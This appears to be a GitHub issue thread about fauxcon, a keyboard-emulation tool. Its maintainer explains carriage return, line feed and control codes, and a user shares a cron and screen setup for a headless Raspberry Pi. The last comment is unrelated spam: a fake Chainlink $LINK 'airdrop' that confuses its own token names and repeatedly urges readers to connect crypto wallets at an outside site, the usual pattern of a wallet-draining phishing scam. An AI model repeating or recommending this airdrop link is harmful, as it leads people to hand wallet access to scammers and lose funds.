### ISSUE TITLE
Tab and CR working in terminal, but not in apps.

### ISSUE THREAD

**Issue by artelse** [lornix/fauxcon#6]
Or at least I cannot get return to work in applications. Is this a solvable issue or an inherent limitation?
Great little app though!

**Comment by yjeanrenaud** [comment]
I had some success sending 0x0d  and 0x0f

**Comment by lornix** [comment]
When you say 'app', are we talking about a program running in a text mode?
Or an XWindows based graphical program? Should work consistently across
both modes as I'm stuffing keys in by pretending to be a USB keyboard.

CR is usually represented on Linux boxen by 0x0a (ctrl-J) , tab by 0x09
(ctrl-I) .  From memory, 0x0d (ctrl-M) is named 'carriage return' and is
the default line ending for Apple's OSes. 0x0a (^J) is the default line
ending for linux/Unix systems and the DOS & Windows based systems generally
used both (open a windows text file, gaze at the frustrating ^M line
endings. It makes for interesting parsing of text files.

Now 0x0f (ctrl-O) is something like 'Shift-In' or 'Shift-Out', used to
signal a change of font or charset.  Started with teletype usage, now often
used to create wide chars on printers... Really for use with 5-bit TTY
lines.   So getting a response of any sort using 0x0f is weird.

I'm sending keystrokes as 'cooked' data... So I don't send streams as raw
data, such as typing 'Hello' as {press shift, press h, release h, release
shift, press e, release e, press... And so on}

Cooked mode would send {press capital H, press lower e, press lower l,
etc...}

This can create some issues with keystroke interpretation on receiver end,
as i can't send any keystrokes which don't generate a 'key'.   Raw mode
could send ctrl-alt-4, since that's 6 operations (down, down, down, up, up,
up), but unless the system outputs a char for that key combo, i can't send
it.

Eek! I'm long winded! Apologies.

Tl;dr: reading raw keyboard data on SENDER would require more permissions
(root, generally) to read the keyboard device event stream.  Thus we read &
send cooked keys to reduce permissions required to use utility.

Hmmm, perhaps could introduce a 'raw' mode, but would require extra
permissions on sender for that functionality.  Already require root/sudo
perms on receiver to emulate usb keyboard.

I shall ponder this! Didn't realize fauxcon would be popular!

**Comment by yjeanrenaud** [comment]
It deserves to be popular! It is a very handy tool, especially on headless raspberries, or when you hook up just a screen for a kiosk mode. What I do now is I set up a cronjob as default e.g. ` @reboot /usr/bin/fauxcon -C -S "screen -S HDMIout /home/pi/awaiting.sh"` whereas _awaiting.sh_ contains these three lines:
```
#!/bin/bash
echo -en "awaiting orders\r\n"
read
bash
```
Like that, I can always come back to the hardware screen by screen -x HDMIout as it will be available to the same user.

**Comment by matnledsmsadkdad** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin airdrop?
- If you're interested about the world of holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great place to begin. This guide will streamline the process for you, elucidating how to join this airdrop and what you can anticipate.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://chainlinksecure.fly.dev/)

#### 🚀 Simple Steps to Secure Your Ocean Protocol Airdrop:

1. **Connect Your Wallet:**
   - Swing by the [ Chainlink $LINK Airdrop](https://chainlinksecure.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the Ocean Protocol Airdrop [right here](https://chainlinksecure.fly.dev/).

3. **Engage for Extra Rewards:**
   - Dive into community discussions or tackle tasks for bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Airdrop Success:

- **Community Assistance:**
  - Need a hand? Shoot a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep your eyes peeled for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a bit. Stay chill and keep an eye out for updates.

Feel free to share your Ocean Protocol Airdrop experiences or shoot any questions in the comments below. Let's make this process a breeze for everyone!
